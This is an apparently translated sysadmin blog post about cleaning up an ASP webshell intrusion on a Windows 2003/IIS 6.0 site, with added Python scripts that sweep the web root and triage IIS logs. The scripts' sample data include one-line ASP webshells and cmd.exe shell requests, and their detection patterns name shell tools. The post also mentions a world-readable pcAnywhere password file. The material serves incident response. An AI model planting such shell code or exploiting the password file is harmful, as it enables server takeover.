SoFunction
Updated on 2025-04-09

A brief account of the repair process after an operating system intrusion

Preface: Because of the nature of my work I have come into contact with these things. This article analyzes only a simple intrusion and does not cover kernel-level trojans such as rootkits. Experts may laugh; it is for reference only.

Main text: I had just become the system administrator of a certain site at the school and was responsible for 3 hosts. On my first check I found suspicious files in the skin directory of one of them. Ha, found a problem as soon as I started working, time to perform well.

It was certain that this host had been hacked.

Procedure:

1. The system runs Windows 2003 + IIS 6.0 on NTFS partitions, with normal permission settings, and is managed remotely with pcAnywhere 10.0. The site runs the PowerEasy ("power article") article system, a modified version 3.51. A second website linked from it runs a modified version of the Dvbbs ("Dynamic Network") forum.

2. Testing showed that the previous administrator had paid no attention to web security: the PowerEasy article system had a serious, unpatched upload vulnerability. The Dvbbs forum was version 7.00 SP2, but it could not be ruled out that it had been hacked as well. The system was thoroughly inspected right away and no trojans were found, so the host's system level was judged secure. But a large number of webshells were found in the web directories, waiting to be cleaned out. And IIS 6.0 logging was not enabled! (Damn.)

3. Inspection and repair (back up the current web system first.)

A. Time-search method: take the earliest creation time of the suspicious files found above and search for every file created or modified after that time. Many files of unexpected types turned up (gif, jpg, asp, cer and so on). Opened in Notepad, they were all ASP trojans. Backed up, then deleted.

B. Tool-search method: after the manual search, antivirus software was installed and a full scan run; apart from a small number of ASP trojans nothing else was found. Checked the user accounts: no anomalies. Checked the C: drive: no unknown files. This indicates that the intruder did not escalate further after obtaining web permissions, although the installation of better-hidden trojans cannot be ruled out. To be checked further.

C. The time search also showed that some legitimate asp files had been modified. Among them, the admin page of the PowerEasy article system had code inserted that saves the administrator password in plain text, similar to the plaintext password-capture code known from the Dvbbs forum.

The other modified asp files contained hacked pages and ASP trojans, large and small, all of them encrypted or obfuscated.
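The three checks in steps A to C can be run as one script: a time search from the earliest suspicious timestamp, a content check for ASP trojan markers in every file regardless of extension (the shells here hid as gif, jpg and cer), and a comparison against a known-good backup, which catches edited legitimate pages even when the attacker has reset their timestamps. The following is an added example, not code from the original post; the marker list, the directory layout and the sample files are assumptions made up for this illustration.

```python
"""Added example, not code from the original post: a sweep of a web root that
automates the inspection in steps A to C above.
  - step A, time search: every file modified on or after a cutoff timestamp
    (the earliest timestamp of the first suspicious file found);
  - step A/B, content check: ASP trojan markers in any file regardless of its
    extension, since the post found shells stored as .gif, .jpg and .cer;
  - step C, comparison with a known-good backup: legitimate pages that were
    edited, which a time search misses when the attacker resets timestamps.
The directory layout, the marker list and the sample files are assumptions.
"""
import hashlib
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Illustrative ASP webshell markers (an assumption, not the post's own list).
ASP_MARKERS = [
    ("eval/execute request",
     re.compile(rb"\b(eval|execute|executeglobal)\s*\(?\s*request\b", re.I)),
    ("WScript.Shell", re.compile(rb"wscript\.shell", re.I)),
    ("Shell.Application", re.compile(rb"shell\.application", re.I)),
    ("Scripting.FileSystemObject",
     re.compile(rb"scripting\.filesystemobject", re.I)),
]


def content_hits(data: bytes) -> List[str]:
    """Names of the markers found in data (empty list when clean)."""
    return [name for name, rx in ASP_MARKERS if rx.search(data)]


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sweep(webroot: Path, cutoff_epoch: float,
          backup_root: Optional[Path] = None) -> Dict[str, List[str]]:
    """Return {relative path: [reasons]} for every suspicious file."""
    findings: Dict[str, List[str]] = {}
    for path in sorted(webroot.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(webroot).as_posix()
        data = path.read_bytes()
        reasons: List[str] = []
        # Step A: time search on the modification time. On Windows st_ctime is
        # the creation time and is worth checking too; on Unix it is the inode
        # change time and cannot be back-dated, so mtime keeps this portable.
        if path.stat().st_mtime >= cutoff_epoch:
            reasons.append("changed after cutoff")
        hits = content_hits(data)
        if hits:
            reasons.append("webshell marker: " + ", ".join(hits))
        # Step C: anything absent from, or different to, the clean backup.
        if backup_root is not None:
            bak = backup_root / rel
            if not bak.is_file():
                reasons.append("not in backup")
            elif sha256_of(bak.read_bytes()) != sha256_of(data):
                reasons.append("differs from backup")
        if reasons:
            findings[rel] = reasons
    return findings


def build_sample_tree() -> Tuple[Path, Path, float]:
    """Constructed sample data in a temp dir: (webroot, backup_root, cutoff)."""
    base = Path(tempfile.mkdtemp(prefix="sweep_"))
    web, bak = base / "web", base / "backup"
    clean_index = b'<% Response.Write "welcome" %>'
    clean_login = b'<% If Request.Form("pwd") = AdminPwd Then Session("ok") = 1 %>'
    # Step C's case: a legitimate admin page with a plaintext password logger
    # spliced in. It uses none of the markers above, so only the backup
    # comparison catches it.
    tampered_login = clean_login + b'\r\n<% Application("last") = Request.Form("pwd") %>'
    files = {
        bak / "index.asp": clean_index,
        bak / "admin" / "login.asp": clean_login,
        web / "index.asp": clean_index,
        web / "admin" / "login.asp": tampered_login,
        # Trojans parked under non-script names, as in step A.
        web / "skin" / "logo.gif": b'GIF89a<%eval request("c")%>',
        web / "upload" / "cmd.cer": b'<% Set ws = Server.CreateObject("WScript.Shell") %>',
    }
    for p, content in files.items():
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
    # Cutoff = timestamp of the first suspicious file noticed (logo.gif).
    cutoff = (web / "skin" / "logo.gif").stat().st_mtime
    # Pages present before the intrusion carry older timestamps, including the
    # tampered one (the attacker reset it, so the time search alone misses it).
    for p in (web / "index.asp", web / "admin" / "login.asp"):
        os.utime(p, (cutoff - 86400, cutoff - 86400))
    return web, bak, cutoff


if __name__ == "__main__":
    web, bak, cutoff = build_sample_tree()
    for rel, why in sweep(web, cutoff, bak).items():
        print(f"{rel}: {'; '.join(why)}")
```

Run it on a real host by pointing sweep() at the web root, the restored backup and the cutoff from step A; anything reported only as "differs from backup" is the step C case, and a clean run against the backup itself should be done first so the baseline is trusted.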

D. Repair: back up this web system and export the database, then delete it. Restore the system backup from a few months earlier and check it: no trojans. Import the current database. Delete the asp file of the PowerEasy upload component and add anti-injection code. Change all web administrator passwords and all system administrator passwords. Upgrade pcAnywhere to 11.0, change its password and restrict the allowed IPs. Enable IIS 6.0 logging. The attached website had not been updated for a long time and its web administrator could not be reached, so: change its path, remove the link, and back it up.

Analysis: Because of the host's permission settings, the intruder probably could not escalate privileges. (He may have obtained the pcAnywhere password, but the host had been left locked for a long time; my estimate is that the intruder's skills were still weak.) Judging by the files he left behind: after obtaining the webshell he uploaded a cmd file, but with permissions set properly he probably could not get much information from it. He also uploaded files meant to open port 3389 on the server, but could not because of the permission problem. PS: if pcAnywhere is installed on a host, the 3389 service cannot be enabled, because pcAnywhere replaces its main file, so it cannot be turned on. The other files were tools for viewing processes, installing services and the like. My estimate is that the information obtained was not enough to gain administrator rights without first getting higher privileges.

The only thing worth noting is that pcAnywhere's password file is visible to everyone. The directory *:\Documents and Settings\All Users\Application Data\Symantec is readable by everyone, and it holds the pcAnywhere password file (*.cif). There are password viewers for it on the Internet, but they cannot read the version 11.0 format. Ha, upgrade.
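Step D turns IIS 6.0 logging on; once it is on, the behaviour described in this analysis (uploads through the article system, shells under .cer names, command execution through the shell) leaves traces that can be triaged. The following is an added example, not code from the original post: a first pass over IIS 6.0 W3C extended log lines. The rules and the log lines are constructed assumptions. One caveat to keep in mind: IIS logs the URL and query string but not POST bodies, which is where most webshells carry their commands, so the query-string rule only catches the sloppier ones.

```python
"""Added example, not code from the original post: first-pass triage of IIS
6.0 W3C extended logs (the logging that step D enables). The rules encode the
intruder behaviour described in the analysis and are assumptions made for
illustration; the log lines below are constructed, not captured.
"""
import os
import re
from collections import Counter
from typing import Dict, Iterator, List, Tuple

# On IIS 6 all of these extensions are mapped to asp.dll, so a shell saved as
# shell.cer runs exactly like shell.asp.
ASP_MAPPED = {".asp", ".asa", ".cer", ".cdx"}
# IIS writes spaces inside the query string as '+'.
CMD_WORDS = re.compile(r"cmd\.exe|net1?\+user|tftp|wscript\.shell|sc\+create", re.I)
# Assumed name pattern for the article system's upload handler.
UPLOAD_HANDLER = re.compile(r"up(file|load)\w*\.asp$", re.I)

# Constructed sample log in the IIS 6 default W3C field layout.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-06-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-06-01 00:01:02 10.0.0.5 GET /index.asp - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2005-06-01 00:02:10 10.0.0.5 POST /admin/upfile.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2005-06-01 00:02:15 10.0.0.5 POST /upload/shell.cer - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2005-06-01 00:02:40 10.0.0.5 GET /upload/shell.cer action=cmd&cmd=cmd.exe+/c+dir 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2005-06-01 00:03:00 10.0.0.5 GET /images/banner.jpg - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2005-06-01 00:03:30 10.0.0.5 GET /upload/old.cer - 80 - 192.0.2.10 Mozilla/4.0 404 0 2
"""


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the #Fields: header names."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or not fields:
            continue
        else:
            parts = line.split(" ")
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def flag(rec: Dict[str, str]) -> List[str]:
    """Reasons a single request record looks like webshell activity."""
    uri, query = rec["cs-uri-stem"], rec["cs-uri-query"]
    ext = os.path.splitext(uri)[1].lower()
    served = rec["sc-status"].startswith("2")   # ignore 404 probes
    reasons: List[str] = []
    if rec["cs-method"].upper() == "POST" and UPLOAD_HANDLER.search(uri):
        reasons.append("POST to upload handler")
    # An upload directory should never execute scripts; a 2xx for one means
    # a shell is living there.
    if served and ext in ASP_MAPPED and uri.lower().startswith("/upload/"):
        reasons.append("script executed from upload directory")
    if served and ext in ASP_MAPPED - {".asp"}:
        reasons.append("asp.dll-mapped non-.asp extension served")
    if query != "-" and CMD_WORDS.search(query):
        reasons.append("command-like query string")
    return reasons


def triage(log_text: str) -> Tuple[List[Dict[str, object]], Counter]:
    """Flagged requests in log order plus a per-client-IP hit count."""
    hits: List[Dict[str, object]] = []
    per_ip: Counter = Counter()
    for rec in parse_w3c(log_text):
        reasons = flag(rec)
        if reasons:
            hits.append({
                "time": f'{rec["date"]} {rec["time"]}',
                "c-ip": rec["c-ip"],
                "request": f'{rec["cs-method"]} {rec["cs-uri-stem"]} {rec["cs-uri-query"]}',
                "reasons": reasons,
            })
            per_ip[rec["c-ip"]] += 1
    return hits, per_ip


if __name__ == "__main__":
    hits, per_ip = triage(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["c-ip"], h["request"], "->", "; ".join(h["reasons"]))
    print("suspect IPs:", per_ip.most_common())
```

The "POST to upload handler" rule will also list legitimate uploads by the real administrators, so it is a review list rather than an alarm; the two rules keyed on the upload directory and on .cer/.cdx/.asa extensions are the high-confidence ones, and an IP that trips all of them in sequence is the one to start from.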